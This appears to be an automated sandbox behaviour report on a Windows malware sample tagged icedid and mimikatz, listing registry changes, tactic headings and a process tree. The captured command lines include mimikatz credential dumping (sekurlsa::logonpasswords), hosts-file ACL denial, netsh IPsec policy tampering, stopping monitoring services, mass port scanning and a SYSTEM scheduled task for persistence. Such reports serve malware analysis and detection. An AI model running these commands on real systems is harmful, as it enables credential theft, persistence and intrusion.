\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tyxtue.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bcnqaufec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ypseczenn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gyksekf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 4232 cmd.exe 2424 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x00070000000234c4-6.dat nsis_installer_2 behavioral2/files/0x00080000000234db-15.dat nsis_installer_1 behavioral2/files/0x00080000000234db-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
gyksekf.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" gyksekf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing gyksekf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" gyksekf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" gyksekf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ gyksekf.exe Key created \REGISTRY\USER\.DEFAULT\Software eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" gyksekf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eyclekfbe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eyclekfbe.exe -
Modifies registry class 14 IoCs
Processes:
gyksekf.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ gyksekf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" gyksekf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" gyksekf.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 3948 schtasks.exe 4684 schtasks.exe 2492 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
gyksekf.exepid Process 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 652 652 652 652 652 652 652 652 652 652 652 652 652 652 652 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exepid Process 4944 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exegyksekf.exegyksekf.exevfshost.exeeyclekfbe.exerslzfe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exeeyclekfbe.exedescription pid Process Token: SeDebugPrivilege 4944 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2336 gyksekf.exe Token: SeDebugPrivilege 3136 gyksekf.exe Token: SeDebugPrivilege 3584 vfshost.exe Token: SeDebugPrivilege 2244 eyclekfbe.exe Token: SeLockMemoryPrivilege 5016 rslzfe.exe Token: SeLockMemoryPrivilege 5016 rslzfe.exe Token: SeDebugPrivilege 1656 eyclekfbe.exe Token: SeDebugPrivilege 2304 eyclekfbe.exe Token: SeDebugPrivilege 4424 eyclekfbe.exe Token: SeDebugPrivilege 4680 eyclekfbe.exe Token: SeDebugPrivilege 740 eyclekfbe.exe Token: SeDebugPrivilege 3732 eyclekfbe.exe Token: SeDebugPrivilege 3420 eyclekfbe.exe Token: SeDebugPrivilege 212 eyclekfbe.exe Token: SeDebugPrivilege 3316 eyclekfbe.exe Token: SeDebugPrivilege 1548 eyclekfbe.exe Token: SeDebugPrivilege 4752 eyclekfbe.exe Token: SeDebugPrivilege 4784 eyclekfbe.exe Token: SeDebugPrivilege 3236 eyclekfbe.exe Token: SeDebugPrivilege 5048 eyclekfbe.exe Token: SeDebugPrivilege 464 eyclekfbe.exe Token: SeDebugPrivilege 4460 eyclekfbe.exe Token: SeDebugPrivilege 3816 eyclekfbe.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exegyksekf.exegyksekf.exexohudmc.exetyxtue.exegyksekf.exegyksekf.exepid Process 4944 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe 4944 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe 2336 gyksekf.exe 2336 gyksekf.exe 3136 gyksekf.exe 3136 gyksekf.exe 1968 xohudmc.exe 2144 tyxtue.exe 1872 gyksekf.exe 1872 gyksekf.exe 5464 gyksekf.exe 5464 gyksekf.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.execmd.exegyksekf.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 4944 wrote to memory of 4232 4944 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe 82 PID 4944 wrote to memory of 4232 4944 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe 82 PID 4944 wrote to memory of 4232 4944 2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe 82 PID 4232 wrote to memory of 2424 4232 cmd.exe 84 PID 4232 wrote to memory of 2424 4232 cmd.exe 84 PID 4232 wrote to memory of 2424 4232 cmd.exe 84 PID 4232 wrote to memory of 2336 4232 cmd.exe 85 PID 4232 wrote to memory of 2336 4232 cmd.exe 85 PID 4232 wrote to memory of 2336 4232 cmd.exe 85 PID 3136 wrote to memory of 4436 3136 gyksekf.exe 87 PID 3136 wrote to memory of 4436 3136 gyksekf.exe 87 PID 3136 wrote to memory of 4436 3136 gyksekf.exe 87 PID 4436 wrote to memory of 220 4436 cmd.exe 89 PID 4436 wrote to memory of 220 4436 cmd.exe 89 PID 4436 wrote to memory of 220 4436 cmd.exe 89 PID 4436 wrote to memory of 3680 4436 cmd.exe 90 PID 4436 wrote to memory of 3680 4436 cmd.exe 90 PID 4436 wrote to memory of 3680 4436 cmd.exe 90 PID 4436 wrote to memory of 2212 4436 cmd.exe 91 PID 4436 wrote to memory of 2212 4436 cmd.exe 91 PID 4436 wrote to memory of 2212 4436 cmd.exe 91 PID 4436 wrote to memory of 1956 4436 cmd.exe 92 PID 4436 wrote to memory of 1956 4436 cmd.exe 92 PID 4436 wrote to memory of 1956 4436 cmd.exe 92 PID 4436 wrote to memory of 2436 4436 cmd.exe 93 PID 4436 wrote to memory of 2436 4436 cmd.exe 93 PID 4436 wrote to memory of 2436 4436 cmd.exe 93 PID 4436 wrote to memory of 1504 4436 cmd.exe 94 PID 4436 wrote to memory of 1504 4436 cmd.exe 94 PID 4436 wrote to memory of 1504 4436 cmd.exe 94 PID 3136 wrote to memory of 2328 3136 gyksekf.exe 102 PID 3136 wrote to memory of 2328 3136 gyksekf.exe 102 PID 3136 wrote to memory of 2328 3136 gyksekf.exe 102 PID 3136 wrote to memory of 4380 3136 gyksekf.exe 104 PID 3136 wrote to memory of 4380 3136 gyksekf.exe 104 PID 3136 wrote to memory of 4380 3136 gyksekf.exe 104 PID 3136 wrote to memory of 2932 3136 gyksekf.exe 106 PID 3136 wrote to memory of 2932 3136 gyksekf.exe 106 PID 3136 wrote to memory of 2932 3136 gyksekf.exe 106 PID 3136 wrote to memory of 4904 3136 gyksekf.exe 110 PID 3136 wrote to memory of 4904 3136 gyksekf.exe 110 PID 3136 wrote to memory of 4904 3136 gyksekf.exe 110 PID 4904 wrote to memory of 460 4904 cmd.exe 112 PID 4904 wrote to memory of 460 4904 cmd.exe 112 PID 4904 wrote to memory of 460 4904 cmd.exe 112 PID 460 wrote to memory of 1340 460 wpcap.exe 113 PID 460 wrote to memory of 1340 460 wpcap.exe 113 PID 460 wrote to memory of 1340 460 wpcap.exe 113 PID 1340 wrote to memory of 2268 1340 net.exe 115 PID 1340 wrote to memory of 2268 1340 net.exe 115 PID 1340 wrote to memory of 2268 1340 net.exe 115 PID 460 wrote to memory of 1696 460 wpcap.exe 116 PID 460 wrote to memory of 1696 460 wpcap.exe 116 PID 460 wrote to memory of 1696 460 wpcap.exe 116 PID 1696 wrote to memory of 4048 1696 net.exe 118 PID 1696 wrote to memory of 4048 1696 net.exe 118 PID 1696 wrote to memory of 4048 1696 net.exe 118 PID 460 wrote to memory of 2428 460 wpcap.exe 119 PID 460 wrote to memory of 2428 460 wpcap.exe 119 PID 460 wrote to memory of 2428 460 wpcap.exe 119 PID 2428 wrote to memory of 2208 2428 net.exe 121 PID 2428 wrote to memory of 2208 2428 net.exe 121 PID 2428 wrote to memory of 2208 2428 net.exe 121 PID 460 wrote to memory of 1788 460 wpcap.exe 122
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1628
-
C:\Windows\TEMP\sgscbupeb\rslzfe.exe"C:\Windows\TEMP\sgscbupeb\rslzfe.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-02_55c66a979c113f2725cd67113c831f70_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nlinnsgc\gyksekf.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2424
-
-
C:\Windows\nlinnsgc\gyksekf.exeC:\Windows\nlinnsgc\gyksekf.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2336
-
-
-
C:\Windows\nlinnsgc\gyksekf.exeC:\Windows\nlinnsgc\gyksekf.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:220
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:1956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2436
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1504
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2328
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4380
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\imzygjkjt\lezcicjbi\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\imzygjkjt\lezcicjbi\wpcap.exeC:\Windows\imzygjkjt\lezcicjbi\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:460 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:2268
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4048
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2208
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4036
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2332 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3472 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2984
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3424 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3460 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2256
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\imzygjkjt\lezcicjbi\bcnqaufec.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\imzygjkjt\lezcicjbi\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:1748 -
C:\Windows\imzygjkjt\lezcicjbi\bcnqaufec.exeC:\Windows\imzygjkjt\lezcicjbi\bcnqaufec.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\imzygjkjt\lezcicjbi\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\imzygjkjt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\imzygjkjt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2476 -
C:\Windows\imzygjkjt\Corporate\vfshost.exeC:\Windows\imzygjkjt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qlinrybei" /ru system /tr "cmd /c C:\Windows\ime\gyksekf.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1704 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1336
-
-
